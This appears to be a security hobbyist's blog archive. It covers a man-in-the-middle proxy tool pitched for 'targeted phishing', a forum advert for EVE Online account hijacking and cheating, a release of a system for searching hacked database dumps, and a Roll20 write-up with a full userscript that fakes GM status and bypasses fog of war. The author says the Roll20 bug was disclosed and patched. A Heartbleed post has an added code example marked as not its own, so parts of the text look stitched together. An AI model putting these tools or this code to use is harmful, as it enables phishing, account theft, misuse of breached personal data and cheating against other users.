Nibbler 0.4 – Better Late Than Never

Nibbler 0.4 introduces a very nice new feature, HTTP Async. When enabled, the program will attempt to correct for one side of the conversation disconnecting. This should hopefully allow Nibbler to be set up as a proxy pointing to another site. In addition to this new feature, I’ve added a “Honeypot Mode” that will log all traffic that goes through Nibbler to a file. This works excellently in conjunction with the HTTP Async feature for targeted phishing.

In addition, Nibbler now has XOR encryption support. This will allow the tool to strip or apply XOR encryption to any stream that passes through it. It works just like RC4 stripping; the only difference is which radio button you click.

A bug that allowed a user to crash the program by connecting it to itself and sending a packet has been fixed.

Before 0.5, expect to see improved HTTP Async and various other features. The HTTP functionality at the moment loses packets if they’re sent in the middle of a socket closure, and this is at the top of the list of bugs to address. Overall, Nibbler development is continuing along swimmingly.

Please be aware the repo has changed: https://github.com/cryptotoad/Nibbler-2

Nullsec Club – EVE Online Hacking, Botting, and Cheating Forum

Nullsec Club is a brand new forum for people who enjoy playing unfairly in EVE Online. Featuring categories on botting, glitching, account hijacking, and just general gaming, Nullsec Club aims to be your #1 resource for Eve Online shenanigans. Feel free to give us a peek at http://nullsec.club/

LibertyVPS – A Turd Among Polished Turds.

I normally don’t make blog posts with the purpose of talking negatively about a company, but recently I had an experience so bad with LibertyVPS.net that I felt I absolutely had to write about it. LibertyVPS is advertised as a VPS hosting company, but they would be more accurately referred to as a “VPS Gambling Site”, as when you send in your money you can never be sure if you’re actually going to get a VPS.

I decided it would be a safe bet to send in my 0.1 BTC for a month of VPS hosting. The site seemed legitimate enough, and advertised instant setup. Perfect, I thought. After placing an order, I was dismayed to find out that the “Instant Setup” advertised on the home page was a blatant lie. There was no instant setup. In fact, I’m inclined to believe there is no “setup” at all. After waiting for several hours, I was given the root details for a server. Finally! I connected and got to work setting up services.

About an hour after the VPS was set up, our site began to experience random errors. We attempted a reboot, and the server has been stuck offline ever since. Support is non-existent, and will only reply to tickets that are directly complimenting their service. Anything else waits in a line that could rival Dr. Rockzo’s coffee table.

I’ve since relocated hosting to SexyVPS.com and my service has been excellent, but I felt the need to share my negative experience with the world. There is absolutely NO excuse for what libertyVPS has been doing. I refuse to let another person get scammed by them.

Nibbler 0.2 Alpha – Official Release

Nibbler is a protocol analysis and fuzzing utility intended for viewing how malware communicates with its C&C. It is also able to manipulate traffic in the conversation, using a traditional man-in-the-middle attack. The idea came to me one day when I was thinking to myself, “Wireshark doesn’t cut it, I want to be able to manipulate the stream too.” A day and a half later the most rudimentary version of Nibbler was born.

 

After a bit of polishing, I’ve created a semi-presentable version of the software. It’s still got lots of bugs (for example, the password recovery features tend to break it, and it recovers poorly if one end disconnects, which makes it hard to use on HTTP traffic), but it does what it was made to do pretty well.

 

Current Version (0.2 Alpha):


Old Versions:

0.1 – http://i.imgur.com/nlYduFJ.png

 

Features

Able to proxy traffic from A to B over a socket tunnel

Able to monitor traffic communicated over the tunnel it creates

Able to manipulate traffic over the tunnel through packet spoofing

Able to apply packet filters

Able to strip encryption from RC4 protected streams if you have the key

 

Changelog

0.2

fixed lots of crash bugs
moved all forms into 1
fixed move to top on new data (sorry!)
added disconnect button
etc....

 

Please report any bugs you find or suggest any features you’d like to see in this thread. I have some planned, which are below.

 

AES/XOR stripping

multithreading and a GUI for managing all connected parties (long term)

GUI for packet filters (currently they have a class but haven’t been implemented as a part of the GUI)

Packet recording/playback (one side or both sides of conversation)

Counter next to packet spoofer to support sending packets en masse (for flooding bot list, as an example)

 

 

Github (source and binaries): https://github.com/cryptotoad/Nibbler

 

 

 

Nibbler: Traffic analysis and modification using tunnels

Nibbler is a tool I’ve been working on to analyze and modify network traffic. It does this not by hooking the network adapter, but by performing a man-in-the-middle attack using a socket tunnel. Nibbler initializes a socket connecting out, and listens on another. When either one receives data, Nibbler sends that data out of the other socket. This way, each end of the conversation sees Nibbler as its desired host.

Nibbler currently has the following features:

  • Unicode packet logging
  • Hexadecimal packet logging
  • packet editing (send packets as either end of the conversation)
  • packet filters (automatic packet editing as packets come and go)

The following features are planned to be implemented before release:

  • Log all packets to a file
  • Color code each side of the conversation, and give a separate color for spoofed packets.
  • Add an option to record and replay packets from one side of the conversation
  • Add a GUI for managing and toggling filters

Nibbler nibbling on pakkets

 

Nibbler will be released with full source code once the bugs are ironed out. If you’d like to see a particular feature implemented, feel free to leave a comment!

The Telltale Heartbleed

So with the recent publication of the Heartbleed vulnerability, I felt it necessary to make a post explaining what this is and why you should care. It’s important to give the layman an explanation that properly expresses the scale of this absolutely massive security flaw.

Heartbleed is a vulnerability in the OpenSSL heartbeat functionality. This vulnerability allows anyone who can connect to a vulnerable server’s IP to extract portions of the heap from memory. What exactly does this mean? Basically, you can grab data from the area of memory that contains almost all of the data a hacker would ever want. The heap stores local variables, which are often things like session data, usernames, passwords, private keys, and lots of other things you wouldn’t want to be exposed to an outsider.

 

What does this mean for the layman? If you don’t run a website, you’re probably fine. You can check the sites you frequent using this tool to see if they’re vulnerable. If they are, you should contact the site owners and link them to this article or to Heartbleed.com so that they know the scale of this bug and how to fix it.

 

What about for webmasters? For the IT competent, this is a fairly simple issue to resolve. For those who aren’t so tech savvy it may be a bit more difficult. The first thing to do is to check if you’re vulnerable. You can use the link above, or you can check your OpenSSL version. The following versions are affected (from heartbleed.com):

Status of different versions:

  • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
  • OpenSSL 1.0.1g is NOT vulnerable
  • OpenSSL 1.0.0 branch is NOT vulnerable
  • OpenSSL 0.9.8 branch is NOT vulnerable

Switch to one of the not vulnerable versions of OpenSSL and you’ll be secured against attacks using this method.
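As an added example (not from this post or from heartbleed.com), here is a small Node.js function that turns the list above into a check you can feed the output of `openssl version` to. The version strings used to exercise it are constructed.

```javascript
// Added example: classify an OpenSSL version string against the affected
// list (1.0.1 through 1.0.1f vulnerable; 1.0.1g, 1.0.0 and 0.9.8 not).
// Sample inputs in the demo are constructed.

// "OpenSSL 1.0.1e 11 Feb 2013" -> { branch: "1.0.1", patch: "e" }
function parseOpenSSLVersion(line) {
  const m = /OpenSSL\s+(\d+\.\d+\.\d+)([a-z]*)/.exec(line);
  if (!m) return null;
  return { branch: m[1], patch: m[2] };
}

// Returns 'vulnerable', 'not vulnerable', or 'unknown' for anything the list
// above does not cover (unparseable input, or a branch not on the list).
function heartbleedStatus(line) {
  const v = parseOpenSSLVersion(line);
  if (!v) return 'unknown';
  if (v.branch === '1.0.0' || v.branch === '0.9.8') return 'not vulnerable';
  if (v.branch !== '1.0.1') return 'unknown';
  // Plain 1.0.1 and letters a-f are affected; g and later are fixed.
  // Patch letters are single lowercase characters, so string order works.
  return (v.patch === '' || v.patch <= 'f') ? 'vulnerable' : 'not vulnerable';
}

// Usage: node heartbleed-check.js "$(openssl version)"
if (process.argv[2]) {
  console.log(`${process.argv[2].trim()} -> ${heartbleedStatus(process.argv[2])}`);
}
```

One caveat for the not-so-tech-savvy: distributions that backport fixes (Debian and Ubuntu patched their 1.0.1e packages, for instance) keep the old version number, so a “vulnerable” result from a version string means “go read the package changelog or vendor advisory”, not a final verdict. And as heartbleed.com points out, upgrading alone does nothing about keys and passwords that may already have leaked; those need to be reissued.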

 

It’s important that EVERYONE switch off of the vulnerable openssl libraries, as this vulnerability needs to be eradicated. The threat it poses to the safety of the internet as a place for free exchange of thought is tremendous and I’m sure 3 letter agencies have already begun using it to harvest data, if they weren’t already.

 

Consolidating hacked databases for fun & profit

Many times I’ve encountered the same problem over and over again. I wanted to see all the data about a particular subject, but I didn’t want to have to ctrl-f through tons of .sql dumps to get it. This is a common issue for people in the offensive security industry, as hacked databases can be some of the best sources of information a researcher can get but they’re annoyingly difficult to search through.

I decided this wouldn’t do. As a result, I’ve decided to release my database lookup system. It’s currently built to integrate with a MyBB forum, but it would be trivial to make it standalone. The integration is just for permission management purposes.

The release has all of the following:

A search page that lets you find a user in multiple databases using a simple form

An administration page that lets you add database dumps into your dblookup (simply paste them in the box and click add) or remove a user from your dblookup (type a search query that will return ONLY the results you want to delete and then hit remove.)

Ability to choose which user groups see 10 per page and which user groups see all results (set statically in search.php)

Download: http://uppit.com/gdl7vtrimeg3/lookup.7z

 

To set it up, create a MySQL table named “dblookup” with two columns, one called “content” and one called “source”.

Roll20 exploitation: How I crit my open lock check and became the DM of my own life

Roll20 Exploitation

-CryptoToad

 

The Roll20 platform exists as a medium for players to play d20 based RPG games online, with no limitations based on geography. The downside to allowing technology to fill the void is always the same thing. Security. This is the main focus of this paper, to bring to light several security failings of roll20 so that the system can be improved. These security holes are all exploitable with player permissions, and grant capabilities normally reserved for DM level participants. These include, but are not limited to, initiative hijacking, fog of war bypass, and layer switching.

Initiative is an integral feature of most RPG games. If one wished to cheat in a game, this would probably be the single most important feature to gain manipulation of. Unfortunately, with the Roll20 platform this is incredibly simple to do, as permissions for the initiative list are not set server side. A client-side change can result in unvalidated data being sent and displayed for everyone.

A proof of concept attack can be carried out using the userscript I have attached. I called the script GMO, which is a spoof on GMO foods and GM in the RPG sense.

GMO allows a player to edit the initiatives in the initiative list, as well as draw on the map and GM layers even with no permissions. The initiative editor can remove someone from initiative if you click their picture. It can also allow you to edit the initiative values belonging to any player or NPC by clicking on them. Editing the name fields will only change the score, not the name.

A video showing the initiative editor in action is available here: https://www.youtube.com/watch?v=wGihe5IINgk

In addition, a player can draw on layers that players are normally unable to draw on. While I don’t have read access to the GM layer in this version, I confirmed my DM could see my text when I tested the vulnerability. I could see the marks I created on the map layer fine, as could others.

Fog of war hacks are also possible using this extension as illustrated here: https://www.youtube.com/watch?v=r1GsWbsfULk

The script source is attached. It’s a userscript made with Scriptish. It’s been patched, and as such is only available for educational purposes. This paper was submitted to Roll20 when the bugs were found, hence the present tense. Thanks for understanding.

// ==UserScript==
// @id             1
// @name           GMO
// @version        1.0
// @namespace      
// @author         CryptoToad
// @description    
// @include        http://www.roll20.net/*
// @include        https://www.roll20.net/*
// @include        https://app.roll20.net/*
// @run-at         document-end
// ==/UserScript==

// Leftover from development (never used); kept as in the original script.
var delFromInitiative = document.getElementById('span');
// initiative editable ui-droppable
/*

Features
    Initiative Hack (edit, move, delete)
    Layer Hack (edit GM/Map layer as normal player)
    Fog Hack (removes fog of war)
*/

function setInitiativesEditable() {
    var i;
    var initiativeHTML = document.getElementById("initiativewindow");

    // Give every initiative entry the classes the GM view uses, so the
    // client-side editor treats them as editable.
    var allSpans = initiativeHTML.getElementsByTagName("span");
    for (i = 0; i < allSpans.length; i++) {
        allSpans[i].className = "initiative editable ui-droppable";
    }

    // Turn each token picture into the GM view's remove button.
    var allImages = initiativeHTML.getElementsByTagName("img");
    for (i = 0; i < allImages.length; i++) {
        allImages[i].className = "pictos remove";
    }

    // Make the character list sortable (the "move" part). The original had
    // "classname" here, which only created an unused property.
    var allUl = initiativeHTML.getElementsByTagName("ul");
    for (i = 0; i < allUl.length; i++) {
        if (allUl[i].className.indexOf("erlist") > 1) {
            allUl[i].className = "characterlist ui-sortable";
        }
    }
}

function createUIHook() {
    //adds a button that will execute our h4x
    var toolbar = document.getElementById("floatingtoolbar");
    // Copies of the GM-only toolbar entries (layer chooser, turn tracker)
    // plus our own "inithax" button.
    toolbar.innerHTML = toolbar.innerHTML + "<li class=\"objects\" id=\"editinglayer\" tip=\"Editing Objects &amp; Tokens\"><span class=\"pictos currentselection\"></span><div class=\"submenu\"><ul><li class=\"choosemap\"><span class=\"pictos\" style=\"padding: 0px 3px 0px 3px;\">@</span>Map &amp; Background</li><li class=\"chooseobjects\"><span class=\"pictos\">b</span>Objects &amp; Tokens</li><li class=\"choosegmlayer\"><span class=\"pictos\">E</span>GM Info Overlay</li></ul></div></li><li id=\"startrounds\" tip=\"Begin Turn-Taking\"><span class=\"pictos\">t</span></li><li id=\"inithax\"><img src=\"\" ></li>";
    // Copy of the GM-only fog of war controls.
    toolbar.innerHTML = toolbar.innerHTML + "<li class=\"reveal\" id=\"fogcontrols\" tip=\"Reveal Areas\"><span class=\"pictos currentselection\"></span><div class=\"submenu\"><ul><li class=\"choosereveal\"><span class=\"pictos\">E</span>Reveal Areas</li><li original-title=\"Hold Shift to snap to grid, Ctrl+Z to undo last point, right-click or Esc to complete\" class=\"choosepolygonreveal showtip tipsy-w\"><span class=\"pictosthree\" style=\"font-size: 1.3em;\">c</span>Polygon Reveal</li><li class=\"choosehide\"><span class=\"pictos\">C</span>Hide Areas</li><li class=\"chooseclearfog showtip tipsy-w\" title=\"Reset map back to completely hidden from players (can speed up rendering if you've revealed many small areas)\"><span class=\"pictos\" style=\"position: relative\">#</span>Reset Fog</li></ul></div></li>";
    toolbar.innerHTML = toolbar.innerHTML + "<li id=\"blueberry\">B</li>";

    document.getElementById("inithax").addEventListener("click", uihookClick, false);
    document.getElementById("blueberry").addEventListener("click", blueberryClick, false);
}

function uihookClick() {
    //code to be executed on clicking of our h4x button
    setInitiativesEditable();
}

function blueberryClick() {
    //code to be executed on clicking of our blueberry
    var editorHTML = document.getElementsByTagName("script")[1]; // unused, as in the original
    alert(unsafeWindow.d20_player_id);
    // Overwrite the page's own notion of who we are and whether we are GM;
    // the point of the write-up is that nothing server side checks this.
    unsafeWindow.d20_player_id = "-JGg-A0GmNhnkP2PvITo";
    Object.defineProperty(unsafeWindow, "is_gm", { value: true, writable: false });
    alert(unsafeWindow.d20_player_id);
}

createUIHook();


Dr. Sploitlove – How I came to Stop Worrying and Love the Blog

Hello everyone. My name’s CryptoToad, and I’m a security minded individual looking to make an impact in the scene. In my free time, I’m either analyzing malware, finding a vulnerability, coding a proof of concept, or playing D&D. In the future, you can expect to see me posting analyses, samples, proofs of concept, and other scene related information. I’ll be trying to post at least once a week, so stay tuned for lots of fun and excitement!
